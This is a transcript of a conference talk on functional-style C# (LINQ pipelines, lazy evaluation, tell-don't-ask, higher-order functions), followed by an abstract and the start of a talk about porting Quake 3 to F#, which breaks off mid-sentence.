Now, how does that work? Imagine you have this kind of code in your application, and you have a lot of these kind of code, four statement everywhere, and you have all these loops with mutation everywhere, and a few months goes by, and your company says, you know what, this application works really nicely. Good job, guys. But our performance is really poor. We need to improve performance, and you're scratching your head. How do I improve performance for a large set of data? And there seems to be no real good answer at this point. You're kind of wondering about it, and suddenly one of your colleagues says, I've got a great idea, and immediately you say, what do you have? And your colleague says, you know how we have multi core processors? We could actually use multi-threading, and immediately some really scary thoughts go to your mind. You remember the last project you worked on in this other company where you had sequential code, a lot of code, and they told you that you have to use multi-threading, and so you did. And when you did, did the code look the same as it was before? Not at all. In fact, the code that was elegant and simple kind of ended up becoming a monster, isn't it? And then what did you do every day going to work? You dreaded, because you had to go fix all those bugs in the code, reminds you of that, isn't it? And then while you were fixing the bug, what did you do? Apply for this other job. That is called concurrency, right? So no, we don't want to do that. Well, look at this code for a minute. What, how does this code look like? Well, there is no mutability or external mutability on our hand. In fact, if you were to take this collection, you could simply throw in something as simple as parallel, and then you could have this execute concurrently. Of course, the trivial example you're looking at here, but imagine each of this in the sequence where a serious amount of work to be done. What would happen then? You're not modifying a lot of code. The structure of the code between concurrent and sequential code is exactly the same. So you're able to enjoy multi-threading without having to compromise on a lot of code quality and expressiveness and conciseness and understandability, maintainability, all those good stuff. This leads to a better programming style, really. And as a result, there are some really good benefits that this provides for us for avoiding side effect and writing pure functions. So instead of accepting data alone, we can accept functions as well. Take a look at each of these functions here for a minute. Notice what happened here. The where is a higher order function because it is accepting another function as a parameter. Similarly, is the for each function. So we can pass functions to functions. In the case of the imperative style, it is very hard to compose your functions. Whereas it's very easy to compose. I want you to think of these two words for a minute because these make a very fundamental difference. Think of the word statement for a minute. How do you feel when you think of the word statement? It kind of sucks the life out of you, right? Because it tells you something certainly. And what happens when you use a statement? Imagine for a minute, you use a if statement, which is one of the things I really hate. If you use a if statement, what happens? If something, and then it does some work over here, and then you say else, and it does something else over here, and then you go to the if and say, how did it go? And if said, yep, I'm done. 
Well, what's the result? And what does if say? I won't tell you, right? I put a result somewhere there in the memory, you go get it if you want to. So this is one of the things I really hate about statement. Statements definitely, right? Because they don't return anything, force mutation on us. They're very grim. They take the life out of us. A good language really has no statements at all in it. What they have instead are called expressions. Now look at the word expression. You feel light already when you say it, isn't it? I can see smiles on people's face already when you say expression. That means you are going to smile more when you write code. Imagine a language where there are no statements, but there are only expressions. Well, this is something for us to think about when we design our own APIs. Don't make your APIs statements, instead make them expressions. It becomes a lot easier to work with because expressions return results back to you. They don't force mutation on you, and you can compose when from one expression to another, which is exactly what we are doing here if you notice. You did a for each statement, and once the for each is over, what do you do with the result? Well, you got to go get it from where it put it. On the other hand, notice where nicely gave you a result, and you were able to continue further with it as a nice flow or composition because expressions nicely flow through statements block you, and then you got to go get the result and then go. It's like jumping hurdles, right? Whereas expression nicely flows through for you. And of course, we mutate data normally in a imperative style of code, as you saw in the example, but whereas in this case, if you notice, we nicely transform the data from a collection of all the values to a smaller collection of only even numbers to finally printing them out. So we nicely flow through and transform across these things. Let's enter in this thought just a little bit more. We always do this again in programming. We take a collection of objects, and we want to do something with the collection. For example, we may get a collection of stock symbols. We may want to come up with a list of stock prices. So doubling is just like one of those examples that are everywhere you turn around. There are examples like this you do all the time. You may have stock prices, you may want to get their prices, you may have people's ID, you may want to get their addresses, or insurance coverage. These people have whatever it is. It's a transformation operation we perform. Doubling is just one trivial example of transformation. We do this all the time in the code. How do you do this imperatively? Let's take a look at an example of imperatively doubling each of the elements. We could say in here, for example, var doubled, we could say, for example, and again, you list of integer, again, an empty list, and then we would say for each, and then var element again in numbers. And this time, we would simply say double.add, and then we would say e times 2 to add the elements. And then, of course, once we get to this, we could say doubled.forEach again, and then we could simply output these values that we have on our hand. So we could simply say console.rightLine to output it. Again, this is a very imperative style of writing the code. We can do a lot better than this. So this often in functional programming is called as a transformation or also called as a map operation. So mapping operation is one of my favorites. 
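For reference, the imperative doubling just dictated, next to the Select version the talk turns to next; Select is LINQ's name for the map operation:

    // Imperative transformation.
    var doubled = new List<int>();
    foreach (var e in numbers)
    {
        doubled.Add(e * 2);
    }
    doubled.ForEach(e => Console.WriteLine(e));

    // Declarative transformation: map each element through a function.
    numbers.Select(e => e * 2)
           .ToList()
           .ForEach(e => Console.WriteLine(e));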
You take a collection of input, and then you get a collection of output exactly the same number of output as a number of input, but you apply the transformation function right in between. And that transformation function you specify is automatically applied for each and every element in the collection. So in this case, I'm going to say that I have numbers on my hand, and I want to use a select in this case. That's what C sharp calls it as. And my operation is doubling the elements. And then, of course, when I'm done with it, I can simply say I want to print these values. So we could say for each, and we could simply print out the values in this collection, for example, and we will simply put the name of the function itself to use. So you can see once again, we didn't use a where clause here, but we used a select clause to do this operation. And we can see how powerful this operation is. Again, rather than thinking low level looping, let's think about what operation we want to perform in the collection. We want to take each of the elements in this collection and transform it. And select is not a word that I really connect to as much. Unfortunately, I really like the word map or collect, but this is really a mapping operation. And then you are performing this operation on these elements and then getting the value out of it. So we saw the functional style. This really takes us to some very powerful function composition styles that we can use. Let's take a look at one problem to understand this particular point. Now, let's go back over here and take a look at this example. Let's say we have these numbers 123454, let's say 6789 and 10, let's say. And I want to be able to find this operation. Let's take a problem to solve and see how we're going to solve it. Find the double of the first even number greater than three. So that's what I want to do, right? A simple problem. Find the double of the first even number greater than three. I'm going to write this with the for loop. So int result equals zero to begin with. When I'm done, I want to print the result that we have on our hand, which is to be computed in this example. So for each, I'll even use a for loop, not a for each statement. So var e, and I'm going to say in numbers. And what do I do at this point? Now that I have these numbers, I'm going to say if e is greater than three and e is an even number, then I want to say that result equals e times two. So there you go. What do you think? Is that good? Is it done? You want to break? There's only 20 more minutes. Oh, you want to break statement? Okay. So break. Now is that good now? Notice you went from it is wrong to, I'm not sure. Well, this code is wrong. But I won't tell you how it's wrong. I'm going to run it and it works. But here's the deal, right? Two months goes by. The guy walks in, you know who that guy is called the tester. And he says, your code sucks. And you say, I know it. But tell me how it sucks. That's the part I don't know, right? Well, we don't know how this code sucks. That information is kind of hidden. But rather than finding how this code sucks, let's actually write the code to see how it in a different way and see if it comes up for us. So let's get rid of this imperative style for a few minutes. We'll come back to it. Let's do this in a declarative style, shall we? So here we are numbers dot. In fact, I'm going to output the result directly. So numbers dot. And I want to get only numbers that are greater than three. What operation should I use for that? Aware. 
That's correct. Thank you. Aware. Given an element, element greater than three. And I want all the even numbers. What should I use for it? Aware again. So where, given an element, element mod 2 is equal to zero. And I want to only get the numbers that are going to be doubles, right? I want to double all the values. What would I use for that? Select. That's good. Thank you. And I'm going to say e times two. But I don't want all of them. What do I want? The first one, right? So I say first and that's all I care about. I'm asking for it. Well, okay. What is the problem, though? If you look at this code, both of the code produced the result. Now imagine this was a problem given to you. And you were business analysts said, given these list of stock prices, you know, do this, do this, do this, do this. And you have a code sitting in front of you. A few weeks goes by. You're sitting with somebody who knows the business and they're asking you, what does this code do? What do you say? I'm trying to figure it out still. Hang on. Right? Because notice the loop. You're going loop, loop, loop. Oh, break in the middle. There's more happening before, more happening, you know, outside. What's going on here? You know, we thought with structured programming, we got rid of spaghetti code. We really didn't. That is again a spaghetti code. If you really think about it, we go back and forth in it. Whereas here we are saying, given a collection of values, I'm going to take each of the values and the collection, take only what are greater than three, only that are even that's left, double the values, get the first one. So notice how it begins to read like the problem statement. You don't have to debug the code. You can read it and understand it. So it is very transparent. In other words, but there is a problem in the code on the top. What is the problem? That is hiding. So I want you to think about this for a minute. A good code is like a story, not like a puzzle. I want the code to be like a story. You don't want to read a code and say, wait, wait, wait, let me figure out. And then once you figure out three hours later, a little celebration, I got it, right? You don't want code to be like that. You want the code to be obvious. It should be boring when you read the code so you can go do other fun stuff, right? You don't want to sit there and say, I finally figured out what this code is doing. That is not good use of our time. So I want a good code to be like a story, not like a puzzle, which you have to really figure out what's going on. That's not a good use of our time. So notice what happened in this case. If I go back to the previous code for a second and remember the tester who walked in and said the code sucks, what did the tester really do? The tester ran the code as testers normally do. The tester ran the code on an empty collection. And when the tester ran the code on an empty collection, what would the code do really? Any guess? It returns a zero. That's correct. But how do we know that is the right answer? Is zero the right answer? Or is the right answer, dude, I don't know. You gave me an empty list, right? So in other words, it really didn't reveal the intent quite well at all. On the other hand, if you had written the code in the declarative style, let's try to figure out what's going to happen. Well, the chances are you're going to be programming defensively. And if not, it is much better. I would rather have a code blow up on my face with a huge noise than quietly misbehave, right? 
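Side by side, the two solutions to "double of the first even number greater than three", with the empty-list behavior the tester is about to exploit noted in the comments:

    // Imperative: a loop, a guard, a mutation, a break.
    var result = 0;
    foreach (var e in numbers)
    {
        if (e > 3 && e % 2 == 0)
        {
            result = e * 2;
            break;
        }
    }
    Console.WriteLine(result);   // on an empty list this quietly prints 0

    // Declarative: reads like the problem statement.
    Console.WriteLine(
        numbers.Where(e => e > 3)
               .Where(e => e % 2 == 0)
               .Select(e => e * 2)
               .First());        // on an empty list First() throws InvalidOperationException

One version quietly misbehaves; the other fails loudly.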
Because when a code quietly misbehaves, it's more expensive to find and fix it. When a code blows up on your face, it's easy to figure these out during testing. So for example, in this case, just for our purpose, I'm going to put a try because it's going to blow up and we can see it actually. Otherwise, it's going to pop up a window and I'm not found out that window that pops up here. So I'm going to say catch exception. And I'm going to say in this case, EX, and then I'm going to simply output the exception right for us. So when I run this little piece of code, notice what it says. It says invalid operation exception. The sequence contains no elements. And that was a very clear message that gave us where did that come from? Well, that came from calling the first method. So the first says, yes, I did go looking for the first one, but don't it, you gave me an empty collection for me. I don't have anything to give you. So if the collection was empty, the collection had no even numbers, so the collection had nothing greater than three. And options like this, it can handle fairly well, as we can see in this example. So it doesn't lurk around with problems. It is very revealing, as you would see in this particular case. So that is an example of how we could write this in a much better way in a more of a declarative style rather than writing this in more of a imperative style of code. And so that I prefer a lot over then having to write the code in the imperative style and then dealing with a greater amount of mess on our hand seems reasonable so far. Well, usually at this point, somebody jumps up with a question. What's the question that's on your mind? This looks all right. But look at that. You're doing two ways. One select. Go ahead, please. Right. Well, in this case, it says you have to order the numbers, but it doesn't matter what the ordering is. They want the first from the given order. That's the given in the problem. If not, of course, you would have to sort and do something like that, please. Right. So performance seems to be really a problem, isn't it? So you look at this and say, you know what? I'm almost convinced, but not entirely yet. But the problem here is this is easy to read. I'll give you that. But in the other code I wrote, I clearly have to read hard to understand, but we don't have to worry about it. We only write code. We never read it. So in that code, we did one loop. In here, it appears like we are looping through once to get the values, second time to get the even, third time to double it out of your mind to be able to do that that many times. Let's entertain this thought for just a minute, if you will. I want to go back to the imperative code just for a second, and I'll come back to this. If you look at the imperative code for a second, what is the number of operations we perform? I'm going to ask the gentleman here in the front to keep account for me. You're my counter for me here. So what are we doing? We're going to check for every element. There are 10 elements in this collection, if you notice. Well, where did the elements go? So there are 10 elements in this collection I want to work with. And so these values, 1, 2, 3, 5, 4, 6, 7, 8, and 9. So there are 10 values over here, up to 10 values. So what are we going to do? For 10 values, I'm going to start the looping. I'm going to do this operation greater than 3 and is even. What are we going to do it for? I'm going to do it for 1, 2, 3, 5, and 4. 
So that is 5 times 2 is, well, actually, I'm going to just perform this one operation here. But I'm going to perform greater than 3. I'm going to perform greater than 3 on what? I'm going to do it on 1, 2, and 3. But this will short circuit because it will never get to the other part. So that is 3, keep in mind. For 5, it'll pass through, it'll fail this. So that's two more operations. For 4, it'll pass through both of them. So that is two more. That's 7. It'll perform multiplication. That is 8. So 8 is your number, sir. All right. Excellent. Thanks for your help. Now let's get to the code over here. Now to our human eye, this appears like a lot of waste. And the reason it appears like a lot of waste is we are going from one collection to another collection to another collection. It appears like that's a 20 plus operation. Gosh, what a waste. Let's think through this a little bit in a minute. So it is still running. Let's do a little refactoring before we go. I'm going to change this over here to is greater, greater than 3. And I'm going to change this to, if you will, is even. And I'm going to change this one to double it. And now I'm going to write those methods. So static Boolean is greater than 3 number. And I'm going to simply say return number greater than 3. I'm going to redo this, if you will, for those other two guys. So this is going to be is even. And I'm going to redo this for double it. So in this case, I'm going to simply say percent 2 equals 0. And then finally, I'm going to simply say return times 2 for this value. The result in this case, oh, wait a minute. It should be integer that I'm returning. There we go. So the result is still the same 8 as you can see. That's great. But I forgot to mention one thing here. The collections that you see here have a trade common with my children. They are absolutely lazy to the bone. And I go to my children, hey, you guys, have you done with your homework? Oh, yes. How did it go? Fantastic. Is everything working? Absolutely. Can I see it please? Sure. And they run to their rooms. I don't see them for an hour. Like what are they doing really, right? So that's exactly what these guys do also. You go to this and say a collection. Yeah, go do the where clause done. Do the where again done. Do the select done. Do the find. Oh, dear. Right. It says that's when we have to go do the work, right? They're very smart. So let's go ahead and try this. So I'm going to go back to this one and say I'm going to output at this point is greater than called the far and let's say zero in this case number. So similarly, I'm going to output over here. The same thing. I'm going to say is even called for and then I'm going to say a double it called for. So let's go ahead and run the code and see what's a performance like. Oh, notice now is greater than what's called for one, two, three, five. And then it called is even for five. It called for is greater than for four is even for four double it for four. I see eight operations. What do you have eight as well? So we didn't do any extra work whatsoever in this case, because it is that cool. It is very lazy. Oh, I'm sorry. I forgot to mention you don't say the word like that. The word lazy is pronounced efficient, right? So you can see how efficient this is. So what did it really do? It was smart enough to merge these operations together and say, I'm going to do this for one element. If it is not successful, move to the next one. If it is successful, don't go to the next element. 
Instead, go to the next one and see if that's good, go to the next go down further. Otherwise, go to the top to the next element. So it is smart enough until it gets to the end. Of course, this depends on the nature of the operation you perform, the sequence of the operation to perform, the terminal call you call, all that makes a difference. Just to illustrate this point once more, I wanted to see this just one more time very clearly. Notice this produced that result, but that all was done when the boss comes around. And the boss in this case is the first operation. So what is this like? I'll relate this to an example in my own life. I have to file taxes because I live in a country where there is double taxation in the United States. One, you have to pay your tax and you have to spend more time and money filing that stupid tax return. So tax return is something everybody hates filing more than paying taxes. So there is always one rule I follow. I always file my tax return on the 15th of April. Do you want to know why? It is because on the 15th of April, I wake up and say, I'm still alive. I have to file this. At 11 p.m., I have a conversation with God. God, there is an hour left. If I'm going to be living for tomorrow, I'll spend this hour filing tax. But you tell me now, right? That's called the last responsible moment. You wait until you don't have to do it. First is like that. Notice with the first, you can see that result. I removed the first and I run the code. Look at the quietness. None of those functions ever ran because these guys are saying, cool, we don't have to do it. Right? So that is the whole point of laziness. You're not wasting your effort. You can even roll this into a library and return that collection and you can postpone evaluation at the caller end and you can decide whether to run this or not at your own will. So you can get fairly decent performance by doing this also. And we saw the function computation as a composition here, as you can see. So the point really is we are composing the operations and flowing through the transformation but not losing any performance as you can see or efficiency. So we can be very lazy and I encourage you to be very lazy when it comes to programming in functional style. That is now the other thing I want to talk about is the tell don't ask principle. Now I ran into this quite a few times and I'm surprised every time I run it because my mind I would say is wired deeply into imperative style of programming because that's what I spent years programming in. Functional programming is something I have to put a little bit of effort to really do and I would write a piece of code and I would say this code sucks but I can't tell why it sucks and suddenly it will pop out in my head saying oh gosh wait I'm not being declarative let me try this again. I'll give you one example of this of asking if you will. Imagine for a minute that we have an object called a room object and the room object I'm going to create right here a bunch of rooms if you will. So I'm going to say rooms equals new list of room and I'm going to make this example very easy for us to work with. So I'm going to say new room and I'm going to say booked rooms. So I'm going to create let's say about five rooms here and the last two rooms are not booked at this point. So I got a bunch of rooms on my hand. Now let's take a look at what a room looks like. 
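The laziness argument is easy to reproduce. The sketch below uses illustrative helper names and assumes the same ten values as before; it logs each predicate and projection call so the eight operations can be counted, and shows that without a terminal call nothing runs at all.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

class Program
{
    static bool IsGreaterThan3(int n) { Console.WriteLine($"IsGreaterThan3({n})"); return n > 3; }
    static bool IsEven(int n)         { Console.WriteLine($"IsEven({n})");         return n % 2 == 0; }
    static int  DoubleIt(int n)       { Console.WriteLine($"DoubleIt({n})");       return n * 2; }

    static void Main()
    {
        var numbers = new List<int> { 1, 2, 3, 5, 4, 6, 7, 8, 9, 10 };

        // Building the query does nothing yet: no lines are printed here.
        var query = numbers.Where(IsGreaterThan3).Where(IsEven).Select(DoubleIt);
        Console.WriteLine("Query built, nothing evaluated yet.");

        // First() forces evaluation, but only as far as needed. The log shows eight
        // calls in total: 1, 2 and 3 fail the first check, 5 fails the second,
        // 4 passes both, is doubled, and the pipeline stops.
        Console.WriteLine(query.First()); // 8

        // Drop the terminal call and the whole pipeline stays quiet: no work happens
        // until someone actually asks for a value.
        var unused = numbers.Where(IsGreaterThan3).Where(IsEven).Select(DoubleIt);
    }
}
```

With that, back to the room-booking example the talk is setting up.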
So I'm going to go to the room and if you look at the room class very trivial just to illustrate the point the room has two things. It's got a ease booked I just made this up so that I can see that it goes through some some objects before it succeeds. Ease available takes a date time object and it says if the the logic for implementing of course not done it says checking and then it simply tells you whether the room has been booked or not. Then I have a book function and the book function again takes a date time and what does it do goes through the logic not implemented here and eventually sets book to true if it was successful to book if it was not throw exception do all that fanfare right. So that is our room class. Now I want to go ahead and book a room for a date. So what would I do? So this is my natural first thought I would say for each room in rooms right. So we'll start with the room and what would I do if room dot and I would say the first call is ease available as you can see right here. So I'm going to say if it is available for a date. So what is the date I'm going to say date time date equals let's say date time dot now and I'm going to see if it is available if it is available. I'm going to say room dot book and for the same date but there's one problem if I was able to book it I want to say book to room equals the room that I have on my hand and I have to break from it as well. So you can see the smell slowly coming out of this right. So you're going to sit a little further away and code because it becomes smelly as you're coding this. So in this case of course I'm going to say room book to room equals and if you just do this the compiler gets very angry at you to say that you're not going to be setting this properly right in reality you would have to do a little bit more work here. So what would you do to make sure what if the room was never booked. Well here comes the problem let's say we do this for a minute if I come here and say book to room and I'm going to say zero and I'm going to say the book to room is the book to room the compiler gets angry at you to say what are you talking about you haven't given me a value. So what do you do now you're going to say no that just takes the life out of you right. Anybody here who likes null no right that's a four letter word in programming right. So you don't want that. So when you run this of course that gave you that result but a very smelly code. This is an example of a code that enjoys the asking and in fact I was working in an application where I was doing something like this and I was a little puzzled. I looked at this code and I said you know what I was doing test driven development I was writing test I was writing code we had this code in front of us all the tests passing and I'm telling hey there's something wrong in this code I'm not happy with it and I'm not able to put my finger on what bothers me. Then I spent a few minutes scratching my head and suddenly I realized wait it's a tell-down-ask principle we're asking the room are you available then turning around and booking it please. Please. All right so the question is what if this another thread is in place you're really evil aren't you. Well absolutely that becomes even more of a problem as well really an excellent point. So there's other problems in this code but not even considering multi-threading it's already foobored but we would really have to worry about that as well absolutely. 
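A condensed C# sketch of the "ask" style under discussion. The Room internals are placeholders, since the real availability and booking logic is elided in the talk as well.

```csharp
using System;
using System.Collections.Generic;

// Illustrative Room with the command-query style API under discussion.
class Room
{
    private bool booked;

    public bool IsAvailable(DateTime date)
    {
        // placeholder for the "checking..." logic mentioned in the talk
        return !booked;
    }

    public void Book(DateTime date)
    {
        // placeholder for the real booking logic
        booked = true;
    }
}

class Program
{
    static void Main()
    {
        // Five rooms, the last two not booked, roughly as in the walkthrough.
        var rooms = new List<Room> { new Room(), new Room(), new Room(), new Room(), new Room() };
        rooms[0].Book(DateTime.Now);
        rooms[1].Book(DateTime.Now);
        rooms[2].Book(DateTime.Now);

        var date = DateTime.Now;

        Room bookedRoom = null; // forced to reach for null: a smell already
        foreach (var room in rooms)
        {
            if (room.IsAvailable(date)) // ask...
            {
                room.Book(date);        // ...then turn around and tell
                bookedRoom = room;
                break;
            }
        }

        Console.WriteLine(bookedRoom != null ? "Booked a room" : "No room available");
    }
}
```

The gap between IsAvailable and Book is exactly where the multi-threading concern raised by the audience bites, on top of the null handling that already makes the code smell.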
Okay so there is a few problems we have to think about with multi-threading coming in as well absolutely you are correct. Let's see how we're going to use this telling rather than asking for a minute. So let's do this one more time this is when we have to redesign our API so when you're designing your API we got to move away a little bit from this command query pattern because we say are you available if so I want to book you that is not very what do you call it atomic let's try this one more time I'm going to go back to this code maybe we can make these guys private for a minute so I made that private I made that private and I'm going to change it to public over here Boolean and I could say book if available and in this case I'm going to say date time date over here and I could say if is available for the date then otherwise return false and if it's available I could say book the room because it's available and then of course return true and to go back to your question I would make this code thread safe right I had this in mind when I was writing this code I said darn it and when I looked at the book if available I said to myself hey this is easier to make a thread safe that becomes a concern so I'm really glad you pointed out it's even better than you know injecting that later so absolutely thanks for sharing that thought so we can make this more easily synchronize our thread safe and of course in this case we ask this question now notice what happens to this code let's get back to this code one more time and see what's going to happen to this I'm going to keep the last part the same for a minute if you will if you will and I'm going to say now a room book the room equals and I'm going to say room start well I want to pick one room out of the whole thing what would I use for it let's say I want to pick all of the rooms which match a criteria match criteria what would I use where that's exactly what we're going to use where room and I'm going to say room dot book if available right that's the method name I called it book if available so we'll say book if available and this is going to be date but I don't want all the rooms of course poor guy what would I do with all of that so I'm going to say dot first and get me just the first one so in this case we asked us to get the first room that is available and notice the result is the same but on the other hand though we wrote it in a much simpler and expressive way and this is more clearer in terms of what it's doing right when you find the rooms with this criteria book me the first one that's available so you're able to write that but notice from the output because it is lazy it bailed out the very first time it found a room and didn't keep booking all the other rooms so the output is exactly the same in both cases it looked for four in the previous it looked for four here also because the fourth one is the one that's available the first three were not available at all so the output is the same in both of those we didn't do any extra work however we did a lot less typing with our fingers and less code easy to understand more expressive as well please absolutely so the first also takes a predicate which you could also use absolutely and the reason I like this format more than the other is this gives me a little bit more flexibility to add more rules and remove rules so I like that separation of concern a little bit so that's why I'm a little reluctant for those shortcut methods even though this may be one more line of code this gives me a 
little bit more option to vary the combination but but point well taken absolutely please about there are no available loops rooms this will blow up but you could also do a first or default if you want to or you could put other conditions around it and program it a little more defensively as well I want to talk about wow go ahead please implementation off it's relying on the implementation of the first you are saying well well the correct that's right it's not written anywhere there yes well well that's another story they're lazy well when we when we deal with functional style composition and laziness are the two key factors in my opinion we talk about immutability we talk about higher order functions those are constructs very important but to me practically to be able to use a functional style these are the two things I rely on laziness and composition it's about about a second nature to kind of expect it if the laziness is not there then it's not as effective as you would use composition because composition itself is going to give you overhead laziness is the one that gives you that reliability of you know performance as well so it's hand in hand there are languages which give you composition and not laziness but that's not very effective they eventually have to come to that laziness point of view so it kind of becomes an expectation but it's good to verify as well yeah one last thing I want to talk about I got two minutes but I want to cover that if I can design with higher order functions I want to give you a quick example here if you will of of one thing we can do I want to look at one class here just to illustrate the point I have a class called over here the class is called what is it called I've got a property computer the property computer uses an algorithm but it doesn't want us to decide the algorithm up front you can pass the algorithm in and the algorithm it's going to use in computing and says algorithm calculate something for me so let's look at the property computer for a second I say property computer computer one let's say a computer one equals new property computer and I got to give it an algorithm well let's look at the algorithm for a minute that is an interface right doesn't do anything it's just an interface I've got another one called fast algorithm which is doing some fast calculation let's say I've also got a most accurate algorithm which is also doing some calculation so I want to use these guys so what would I do I would say new fast algorithm so fast algorithm so once I create the algorithm for this guy to use I can say computer one dot compute whatever he wants to compute that's a function I'm going to send some value to it so you can see in this case it is going to use the fast algorithm to do the job similarly I could use one other example here I could say computer two for example and I could say what I wanted to do I could say two here and say whatever I want that to do for example in this case that would be the most used one so let's say most accurate right algorithm so the point really here is we would have to specify classes that we want to use and write the code with it but that's a lot of code to create because we have an inheritance we have hierarchy we have classes more things to write that's a good old strategy pattern but thankfully we don't have to work that hard what we could do instead is we could simply have a library of algorithms so for example we could say class algorithms so obviously you would put this into a separate file if you want to 
and then within this you could say public static and you would say you know compute or whatever you want to do let's take a fast algorithm how about that and the fast algorithm takes an input and we will simply return the input right here right and similarly you could have an accurate algorithm of some choice so we'll call this as accurate so you can rather than creating classes you can create a library of these functions very effectively but here's the beauty we could go get rid of all these monstrous code that we end up creating and make it very lightweight we say this is going to be a function which takes an integer and returns an integer or whatever that you want to deal with and in this case of course i'm going to pass in the values to this particular object right so it should be double and double so we'll say double and double and what does this do it wants a funk object so let's go ahead and say this is our funk object and then i'm saying this is my algorithm and i just remove this part so now i've turned this into a single method implementation very lightweight compared to what we had to do before but the beauty of this is we can simply say now let me just change it to double here so this is takes in a double as an input and returns a double as an output so i got these two methods i could have other methods also i create but the beauty is i simply replace this part with simply algorithms dot and then i could say fast for example likewise i can replace this with a algorithm over here algorithms dot and i could say accurate so the the beauty of this approach is we can simply now start using methods so you can quickly throw in a little method implementation here or you can start referring to other library methods and that makes your code a lot lightweight if you will so to summarize what we talked about here we've been writing code in C-Short for a long time but if we stop for a minute and think of primitive obsession think of higher level of abstraction think of more of a declarative style than imperative style think about how we can actually frame together a set of functions to really be able to express our ideas we don't have to spend as much time and effort to write code the code becomes more expressive more easier to maintain easier to understand and the language already has this power but the biggest change is in our mindset i hope you found that useful thank you you
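To round off the higher-order-function point, here is a compact sketch of the delegate-based strategy the talk closes with. The PropertyComputer and algorithm names follow the example; the algorithm bodies are placeholders, just as they were on the slides.

```csharp
using System;

// Lightweight "library of algorithms": plain static methods instead of a class per strategy.
static class Algorithms
{
    public static double Fast(double input) => input;     // placeholder computation
    public static double Accurate(double input) => input; // placeholder computation
}

class PropertyComputer
{
    private readonly Func<double, double> algorithm;

    public PropertyComputer(Func<double, double> algorithm) => this.algorithm = algorithm;

    public double Compute(double value) => algorithm(value);
}

class Program
{
    static void Main()
    {
        var computer1 = new PropertyComputer(Algorithms.Fast);
        var computer2 = new PropertyComputer(Algorithms.Accurate);

        Console.WriteLine(computer1.Compute(4.0));
        Console.WriteLine(computer2.Compute(4.0));

        // Or hand in a quick one-off strategy inline, with no new class or interface required.
        var computer3 = new PropertyComputer(x => x * x);
        Console.WriteLine(computer3.Compute(4.0));
    }
}
```

Compared with the interface-and-class hierarchy of the classic strategy pattern, the only moving parts here are a Func<double, double> field and whatever methods or lambdas you care to pass in.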
|
Since the introduction of lambda expressions in C#, we have had two different styles of programming. Yet programmers used to the habitual style often find it easy to fall back on old practices. In this presentation we will take a number of common tasks we code in C#, discuss the downsides of the habitual style, transform them into a functional style, and discuss the benefits. We will also discuss some techniques that can help make this transformation easier on everyday projects.
|
10.5446/50878 (DOI)
|
Hello? Hello. Well, thank you for joining this talk. This is about porting Quake 3 to F#; it's my journey to learning functional programming. I'll tell you a little bit about myself. I'm Will Smith. I've lived in Nashville for almost 25 years, and I recently moved out to San Francisco to join a startup called Tachyus. I moved there about four weeks ago, and now I'm flying out here. It's my first time in Scandinavia, or even Europe, or even a different country in general, so there's a lot of stuff going on. So I'm going to tell you a little bit about what I do now. As my job, I use Xamarin and F# for Tachyus. This is what I'm going to be doing. This is my full-time thing, and I'm really happy to be doing this. But so anyway, what is this talk really about? Enterprise. Quake 3, we can use it for the enterprise. We can leverage all the AI and do all those computations that all those enterprise folks just want to use. You can leverage any framework using it. You can see we've got, look, we're really taking advantage of everything. No, I'm just kidding. That's not at all what this is about. So what is it really about? So I started a project. I called it FQuake3. I don't even know if it's even a good name; am I very good with names? I just call it F, as in functional or F#, Quake 3. So you can kind of get an idea of what's probably behind it. But this is my journey to learning functional programming by doing this port. So the first thing I want to talk about is that with this port, the questions that will probably be asked are: how's the performance? How much has been ported? Well, performance doesn't matter, because first I need to get everything working. If it doesn't work, then, well, it has to work first. And the amount of porting I've done is only about 5%. This is over a decade's worth of work for somebody to do. But I'm trying this because I really want to see how functional programming can be applied to something, you know, big. Not Fibonacci, not FizzBuzz: Quake 3. So this begins my journey of how I actually got up to this point. Before I even did this or even started learning functional programming, I did some contributions to a few projects that were in C++. It was okay. The community and how people acted, it was all right. But I kind of moved away from that and said, all right, I'm going to learn C++11. It's got lambdas, that functional thing I hear about; they've got that. So I decided to learn it, but then it ended up not really working out for me. Things were just not as expressive as I wanted them to be. So I moved away from that and found this open source project that a guy named Frederick did, and I did some contributions to it. RTCW co-op, if anybody doesn't know, is Return to Castle Wolfenstein cooperative, so you can play the single-player campaign of RTCW with your friends. This is based on the Quake 3 engine, and I went and just made some contributions to it, and it was written in C. So things I noticed: C was actually kind of elegant compared to C++. There's this separation of data and behavior. Things started to just kind of feel right, and the developers were actually kind of friendly, which was like, okay, well, I don't feel like I'm being shoved against the wall here, so it felt nice. But I started to do something interesting. I tried to write C functionally.
It's like, let's just make a variable. I'm just not going to change this variable. Let's just see what happens. And it was actually kind of interesting. It started to feel right, and I realized that I'd probably need to find a functional language that actually embraced this. And so I found Fsharp out of all the functional languages that are out there. I found this because it fit my requirement of it being functional first, because I still want to use mutability for actually interacting with existing libraries that exist out there. So I have to have that. That's just, that's what you have to do. You have to update the screen. So you have to have some form of mutability there, but if you can push everything to be as functional as possible, that's what I was looking for. And so Fsharp kind of felt like, okay, this is what I wanted to use, but I needed to make sure that it was okay. I started doing some mono research because I always hear about the mono runtime being, oh, it's bad, it's slow, it does all this. But I started doing research on it, and it really wasn't as bad as what people really made it out to be. And I did some examples of my own to see if it actually fit. And sure enough, I felt good about it. I felt confident. And I did all this stuff starting out just in Ubuntu. So I started learning Fsharp and using mono on Ubuntu before I even moved to OSX or Windows using it. So I actually was like, okay, this is actually not as bad as what people say. So I can also use this at work. So Fsharp for Xamarin, iOS, and Android, like right now, I'm now doing Fsharp and iOS. And of course, Fsharp reminded me to see with data and behavior being separated. So okay, that's cool. Made a few example projects using Fsharp. And then that's when Fquake 3 was born. So I wanted to do something real. So now I want to give you a demo of this. Don't have the CD key. Oh, well. Okay, so here I am in the game. My name is Fsharp Quake 3 guy. So this is actually running Fsharp code. There's still like a huge portion of C there, but there is a good portion using Fsharp code. Well, how do I make you believe that? So let's change something then. And my weapon was modified on the fly using the Fsharp interactive. So here I can actually change anything and do whatever I want. And this is a good way to actually learn what is actually going on, like just in the code to figure out, you know, how can I do this, how can I do that without having to recompile the whole thing and running it. I can do it here on the fly and do whatever I choose. I can only do it for the weapon position in this case, but I just see that there's some sort of future in doing stuff like this. That's where I feel development is going to move towards. You'd be able to write something immediately and see the feedback, like on the fly. So what else could I do besides have this weapon that's really far out? So let's go into third person. So there's a head. And now it's up there. Cool. And now there's no head. And now there's Don Sein. So let's go defeat the other Don Sein that's running around in this level here. Where'd he go? Oh, there he is. Come here. Goodbye. So this is a little simple example. We can take it a little bit further in some sense. So I 